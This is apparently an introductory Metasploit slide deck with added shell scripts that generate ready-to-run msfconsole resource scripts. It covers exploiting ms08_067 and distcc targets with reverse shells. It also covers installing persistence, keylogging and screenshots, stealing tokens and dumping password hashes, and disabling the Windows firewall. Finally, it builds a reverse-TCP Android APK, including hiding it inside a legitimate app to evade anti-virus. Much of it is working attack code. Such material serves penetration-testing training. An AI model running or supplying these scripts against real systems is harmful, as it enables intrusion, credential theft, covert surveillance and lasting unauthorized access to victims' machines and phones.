metasploit
INTRODUCTION TO METASPLOIT
#METASPLOIT
G.Manideep,
@mani0x00
- God of Frameworks
#whoami
<?php
$var = "@mani0x00";
if ($var == "script kiddie") {
    echo "security flows in blood";
} elseif ($var == "white hat") {
    echo "security flows in blood";
} else {
    echo "security flows in blood";
}
?>
G.Manideep,
B.Tech 3rd year, E.C.E.
@mani0x00
#Creator
H.D. Moore, developer of the Metasploit Framework.
Chief Research Officer at Rapid7 (Boston), a provider of security data and analytics software and cloud solutions.
#History
In October 2003, Metasploit 1.0 was released by H.D. Moore with 11 exploits.
It was originally written in Perl and was completely rewritten in Ruby for Metasploit 3.0 (2007).
Acquired by Rapid7 in 2009.
The Framework remains open source (BSD licence); the commercial editions are built on top of it.
#Getting started: Vulnerability
A vulnerability is a weakness in a system (a bug or a misconfiguration) that an attacker can exploit.
#Getting started: Exploit
An exploit is code that triggers a particular vulnerability in order to run a payload on the target.
#Getting started: Payload
A payload is the code that runs on the vulnerable system once exploitation succeeds: a shell, a Meterpreter agent, or a single command.
#Architecture
Libraries: Rex, MSF Core, MSF Base
Interfaces: Console, CLI, Web, Armitage
Modules: Exploits, Payloads, Auxiliary, Encoders, Nops
Plugins
Tools
#Libraries
Rex: the Ruby Extension library; sockets, protocols, text and encoding utilities with no dependency on the rest of the framework.
Msf::Core: the basic API that modules are written against; it manages module loading, sessions and the datastore.
Msf::Base: simplified wrappers and helpers built on top of Msf::Core, used by the interfaces.
#Modules
Exploits
Payloads
Auxiliary
Encoders
Nops
#Auxiliary
An auxiliary module is, roughly, an exploit without a payload: it never delivers code to the target.
Used for scanning, fuzzing, brute forcing and other automated tasks.
Built from mixins (for example Msf::Auxiliary::Scanner for modules that take an RHOSTS range).
Launched with the run command rather than exploit.
#Encoders
Encoders rewrite a payload so that it avoids bad characters (for example null bytes in a string overflow) and changes its byte pattern, which used to help against signature-based anti-virus.
Payloads are encoded, not encrypted, and the decoder stub is itself a signature; modern anti-virus detects every stock encoder, so do not rely on them for evasion.
E.g.
• x86/shikata_ga_nai
• x86/nonalpha
• x86/bloxor
#Nops
NOP generators pad the payload so that it keeps a consistent size and so that a NOP sled lands execution on the payload regardless of the exact return address.
The framework shipped 8 NOP modules at the time of the talk.
#Interfaces
#msfcli (one-shot command line; removed in 2015 in favour of msfconsole -x)
#msfconsole
#msfweb (no longer shipped)
#Armitage (GUI)
#Armitage (GUI)
Developed by Raphael Mudge.
#msfconsole
The interactive console, and the most commonly used interface.
Start it with the msfconsole command.
#msfconsole
Here our journey begins:
msf >
#Let's attack
#Port scanning
Port scanning is part of information gathering.
Nmap is the usual tool for it (db_nmap inside msfconsole stores the results in the database).
Auxiliary scanner modules can also be used.
As information gathering is the foundation of a pen test, let's do a traditional scan first.
#Port scanning: Using auxiliary modules
#Port scanning: Using Nmap
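The two scans just described, as an added example that is not part of the original slides: a POSIX shell script that writes an msfconsole resource script (one console command per line) covering both the nmap scan and the auxiliary TCP scanner, and runs it with msfconsole -r when the framework is installed. The target range 192.168.56.0/24, the workspace name "demo" and the port list are assumptions.

```shell
#!/bin/sh
# Added example, not from the original slides: write an msfconsole resource
# script that does both scans from the slide and run it with `msfconsole -r`.
# The target range, workspace name and port list are hypothetical.
set -eu

# Print the resource script on stdout.
# $1 = target host or CIDR range, $2 = workspace name
gen_scan_rc() {
    target=$1
    ws=$2
    # workspace -a creates the workspace and switches to it, keeping this
    # engagement's results separate.  db_nmap runs nmap and imports the
    # output into the database (-sS needs root, which msfconsole usually
    # runs as).  The auxiliary TCP scanner needs no nmap; RHOSTS takes CIDR.
    cat <<EOF
workspace -a ${ws}
db_nmap -sS -sV -Pn --top-ports 100 ${target}
use auxiliary/scanner/portscan/tcp
set RHOSTS ${target}
set PORTS 21-25,80,135,139,443,445,3306,3632,8080
set THREADS 10
run
use auxiliary/scanner/smb/smb_version
set RHOSTS ${target}
run
services -c port,name,info
EOF
}

# Write the script to a temp file and run it if msfconsole is installed;
# otherwise print it so it can be pasted into the console by hand.
run_scan() {
    rc=$(mktemp)
    gen_scan_rc "$1" "$2" > "$rc"
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$rc"
    else
        echo "msfconsole not found; resource script written to $rc" >&2
        cat "$rc"
    fi
}

# Usage: sh scan.sh 192.168.56.0/24 [workspace]
if [ $# -gt 0 ]; then
    run_scan "$1" "${2:-demo}"
fi
```

The two scanners complement each other: db_nmap gives service versions, the pure-Ruby portscan/tcp module works on a box without nmap, and the services command at the end reads back whatever both of them stored.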
#Exploitation
Usually an attacker sends an exploit and a payload together: the exploit triggers the vulnerability and the payload is what runs afterwards.
In msfconsole a few core commands do most of the work:
search, use, set, setg (set an option globally), run, exploit
#Exploitation: Using an exploit
Type use <path of the chosen exploit>.
Prefer an exploit with a good ranking (shown by search and info): Excellent and Great exploits do not crash the service, Average and lower may.
#Exploitation: Setting parameters
Type show options to see the parameters that have to be filled in.
Set each one with set <parameter> <value>.
#Exploitation: Payload
As with exploits, search for an appropriate payload (show payloads lists the ones compatible with the current exploit).
Select it with set PAYLOAD <path> and fill in the payload's own parameters (typically LHOST and LPORT for a reverse shell).
Then type exploit.
#Some successful exploits
exploit/windows/dcerpc/ms03_026_dcom
exploit/windows/smb/ms08_067_netapi (evergreen :D, still found on unpatched XP/2003 hosts)
exploit/windows/browser/ms11_050_mshtml_cobjectelement
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec
exploit/windows/browser/ms10_046_shortcut_icon_dllloader
exploit/windows/ftp/dreamftp_format
exploit/unix/misc/distcc_exec (for Linux)
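The search/use/set/exploit procedure from the previous slides, as an added example that is not part of the original slides: a shell script that generates a resource script launching one Windows exploit (ms08_067_netapi) and one Linux exploit (distcc_exec) from the list above as background jobs. The attacker and target addresses and the listener ports are assumptions.

```shell
#!/bin/sh
# Added example, not from the original slides: the search/use/set/exploit
# flow as a resource script, launching one Windows and one Linux exploit
# from the list above as background jobs.  All addresses are hypothetical.
set -eu

# Commands to launch one exploit as a background job (-j) without dropping
# into the session (-z).  RHOST is accepted by every framework version;
# newer ones also take RHOSTS.
# $1 module, $2 target host, $3 payload, $4 LHOST, $5 LPORT
gen_exploit_rc() {
    cat <<EOF
use ${1}
set RHOST ${2}
set PAYLOAD ${3}
set LHOST ${4}
set LPORT ${5}
show options
exploit -j -z
EOF
}

# A complete run: search shows the candidates with their rankings, setg makes
# LHOST global so every later module inherits it, then the two exploits, then
# a pause before listing whatever sessions came back.
# $1 attacker IP, $2 Windows target, $3 Linux (distcc) target
gen_attack_rc() {
    echo "search ms08_067"
    echo "setg LHOST ${1}"
    gen_exploit_rc exploit/windows/smb/ms08_067_netapi "$2" \
        windows/meterpreter/reverse_tcp "$1" 4444
    gen_exploit_rc exploit/unix/misc/distcc_exec "$3" \
        cmd/unix/reverse "$1" 4445
    echo "sleep 10"
    echo "sessions -l"
}

run_attack() {
    rc=$(mktemp)
    gen_attack_rc "$1" "$2" "$3" > "$rc"
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$rc"
    else
        echo "msfconsole not found; resource script written to $rc" >&2
        cat "$rc"
    fi
}

# Usage: sh attack.sh <attacker ip> <windows target> <linux target>
if [ $# -eq 3 ]; then
    run_attack "$1" "$2" "$3"
fi
```

Each exploit gets its own LPORT so the two handlers do not collide; distcc_exec is a command-execution bug, so its payload is a cmd/unix/* one rather than a staged Meterpreter.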
#Maintaining access
Run the persistence Meterpreter script with arguments:
run persistence -S -i <interval in seconds> -p <port> -r <LHOST>
-S installs the agent as a service that starts at boot (needs SYSTEM); -X starts it at boot through the Run key (needs admin) and -U at user logon (works as an ordinary user).
The script prints the path of a cleanup resource file; keep it, it is the easiest way to remove the agent after the engagement.
#Maintaining access
Listen on the specified port with the exploit/multi/handler module so that the agent can reconnect.
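The handler and the persistence command from these two slides, as an added example that is not part of the original slides. The session id, LHOST, LPORT and interval are assumptions; sessions -C (sending a Meterpreter command to a session from the msf prompt) is a feature of newer consoles, and on current releases the persistence script itself is deprecated in favour of the post/windows/manage/persistence_exe module.

```shell
#!/bin/sh
# Added example, not from the original slides: a handler that keeps
# listening for the agent's callbacks, plus the persistence command to run
# in the session that already exists.  Session id, IP and ports are
# hypothetical.
set -eu

# Resource script for a permanent multi/handler.  ExitOnSession false keeps
# the job alive after the first connection, which a beaconing agent needs;
# -j -z run it as a background job without interacting.
# $1 LHOST, $2 LPORT
gen_handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ${1}
set LPORT ${2}
set ExitOnSession false
exploit -j -z
EOF
}

# The persistence command, issued from msf> to an existing Meterpreter
# session with sessions -C (or typed at the meterpreter> prompt without the
# wrapper).  -X: start at boot via the HKLM Run key (needs admin); use -U for
# a per-user HKCU entry if you only have user rights, or -S for a service
# (needs SYSTEM).  -i: seconds between connection attempts, -p/-r: handler.
# $1 session id, $2 handler host, $3 handler port, $4 interval in seconds
gen_persist_cmd() {
    printf 'sessions -i %s -C "run persistence -X -i %s -p %s -r %s"\n' \
        "$1" "$4" "$3" "$2"
}

# Usage: sh persist.sh <session id> <LHOST> <LPORT> [interval]
if [ $# -ge 3 ]; then
    rc=$(mktemp)
    gen_handler_rc "$2" "$3" > "$rc"
    echo "start the listener with: msfconsole -q -r $rc"
    echo "then install the agent with:"
    gen_persist_cmd "$1" "$2" "$3" "${4:-10}"
fi
```

Start the handler before installing the agent, and match its PAYLOAD, LHOST and LPORT to the -r and -p arguments exactly, otherwise the agent's callbacks are refused.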
#Post Exploitation
Using Meterpreter we can perform many tasks with the privileges of the process we landed in.
We can grab screenshots, log keystrokes and much more by loading extensions:
• espia (screen capture)
• incognito (token stealing)
• sniffer (packet capture on the victim)
• priv (getsystem, hashdump, timestomp)
• stdapi (loaded by default: file system, process, network and UI commands)
Pivoting is not an extension but a route: route add <subnet> <netmask> <session id> (or the autoroute post module) sends traffic for other networks through the session.
#Post Exploitation
The same tasks can also be done with post modules (post/windows/...).
Let's take multiple screenshots at fixed intervals (post/windows/gather/screen_spy, with DELAY and COUNT options).
#Post Exploitation
The module migrates into another process that has the needed privileges (one on the user's desktop) and then completes the task.
#Post Exploitation
What else can we do in post exploitation? Some of it:
- Keylogging
- Screenshots
- View the live screen
- Access the webcam
- Take control of keyboard and mouse
- Delete a user
- Pivot to other networks
- VM detection, and much more
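The post-exploitation tasks listed on the slides above, as an added example that is not part of the original slides: a shell script that writes a Meterpreter resource script, to be run inside a session with the resource command. It uses the espia extension, the stdapi screenshot and keyscan commands, and the checkvm and screen_spy post modules; the DELAY and COUNT values are assumptions.

```shell
#!/bin/sh
# Added example, not from the original slides: the post-exploitation tasks
# from these slides as a Meterpreter resource script, run inside a session
# with `resource <file>`.  DELAY/COUNT values are hypothetical.
set -eu

# Print the Meterpreter commands.
# $1 = seconds between screenshots, $2 = number of screenshots
gen_post_rc() {
    delay=$1
    count=$2
    # screenshot and the keyscan_* commands come from stdapi (loaded by
    # default); screengrab needs the espia extension.  keyscan captures the
    # keystrokes of the desktop our process belongs to: migrate into
    # explorer.exe first for a user's typing, or winlogon.exe for logons.
    # screen_spy takes the repeated screenshots while keyscan is running, so
    # its run time doubles as the keylogging window; post modules can be
    # launched from the session with `run post/...` and KEY=value options.
    cat <<EOF
sysinfo
getuid
screenshot
load espia
screengrab
webcam_list
keyscan_start
run post/windows/gather/checkvm
run post/windows/gather/screen_spy DELAY=${delay} COUNT=${count}
keyscan_dump
keyscan_stop
EOF
}

# Usage: sh post.sh <delay> [count]; then in the session: resource <file>
if [ $# -gt 0 ]; then
    rc=$(mktemp)
    gen_post_rc "$1" "${2:-6}" > "$rc"
    echo "meterpreter > resource $rc"
fi
```

Screenshots and the keystroke dump are written under ~/.msf4/loot on the attacker side; nothing is left on the target's disk, which is the point of doing this from Meterpreter rather than with a dropped tool.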
#Privilege Escalation
Privilege escalation is gaining access that the system was supposed to protect: going from the rights of the exploited process to those of an administrator or SYSTEM.
Two of the techniques are migrating into a higher-privileged process and stealing (impersonating) tokens.
Let's take a look at some of them.
#Privilege Escalation
We can migrate into a PID that runs with admin or SYSTEM privileges (ps lists processes with the user they run as).
#Privilege Escalation
By loading incognito we can steal (impersonate) tokens to get their privileges.
#Privilege Escalation
List them with list_tokens -u, then type impersonate_token <token>.
getsystem (from the priv extension) tries several built-in escalation techniques and is worth running before reaching for incognito.
#Privilege Escalation
#HashDump
Dumps every local user's username and password hashes (LM/NTLM) from the SAM; it needs SYSTEM privileges, so run it after escalation.
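The escalation steps from these slides followed by hashdump, as an added example that is not part of the original slides: a shell script that writes a Meterpreter resource script (run inside the session with the resource command) chaining getsystem, token impersonation with incognito, migration into a SYSTEM process and hashdump. winlogon.exe as the migration target and migrate -N (migrate by process name, which older Meterpreter builds lack) are assumptions.

```shell
#!/bin/sh
# Added example, not from the original slides: the escalation steps from
# these slides (getsystem, token stealing with incognito, migration into a
# SYSTEM process) followed by hashdump, as a Meterpreter resource script to
# run in the session with `resource <file>`.  winlogon.exe is an assumed
# SYSTEM process name.
set -eu

# Print the Meterpreter commands.
gen_privesc_rc() {
    # getsystem (priv extension) tries the built-in techniques first; if it
    # fails, incognito lists the tokens present on the box and impersonates
    # one.  Migrating into a SYSTEM process makes the new rights stick for
    # the session and moves us out of the process that was exploited
    # (older Meterpreter builds lack migrate -N: use ps and migrate <pid>).
    # hashdump reads the SAM and therefore only works as SYSTEM.
    # The quoted heredoc keeps the backslashes in the token name literal;
    # Meterpreter needs them doubled because it unescapes the argument.
    cat <<'EOF'
getuid
getprivs
getsystem
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
ps
migrate -N winlogon.exe
getuid
hashdump
EOF
}

# Usage: sh privesc.sh > /tmp/privesc.rc ; then in the session:
#        meterpreter > resource /tmp/privesc.rc
gen_privesc_rc
```

Check the output of the second getuid before trusting the hashdump: if it still shows the original user, none of the three techniques worked and hashdump will fail with an access-denied error.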
#What else can we do?
We can even sniff the victim's packets remotely (sniffer extension).
Evading firewalls.
Let's take a look.
#Bypassing Firewall
#Bypassing Firewall
After getting a Meterpreter session, drop to a shell and type:
> netsh firewall show opmode
#Bypassing Firewall
Now type:
> netsh firewall set opmode mode=DISABLE
Both need administrative rights. The netsh firewall context is deprecated since Windows Vista; on current systems use netsh advfirewall show allprofiles to check the state and netsh advfirewall set allprofiles state off to disable it. Turning the host firewall off is noisy (the user gets a Security Center alert and host monitoring sees the change), so prefer opening only the port you need, and restore the original state afterwards.
#Attacking Linux
Using exploit/unix/misc/distcc_exec, with the same search/use/set/exploit flow as on Windows.
#Attacking Android
Using msfpayload:
msfpayload android/meterpreter/reverse_tcp LHOST=<loc-ip> LPORT=<any> R > <desired path>/<file>.apk
msfpayload was removed from the framework in 2015; the msfvenom equivalent is
msfvenom -p android/meterpreter/reverse_tcp LHOST=<loc-ip> LPORT=<any> -o <desired path>/<file>.apk
Install that APK on the device (it has to be sideloaded, and the user must accept its permissions).
Encoders do not apply to an APK: they operate on native shellcode, while the Android payload is Dalvik code. If anti-virus flags it, msfvenom -x <legitimate.apk> embeds the payload in an existing app instead.
#Attacking Android
Listen on the mentioned port with the multi/handler exploit (payload android/meterpreter/reverse_tcp).
#Thank you!
-@mani0x00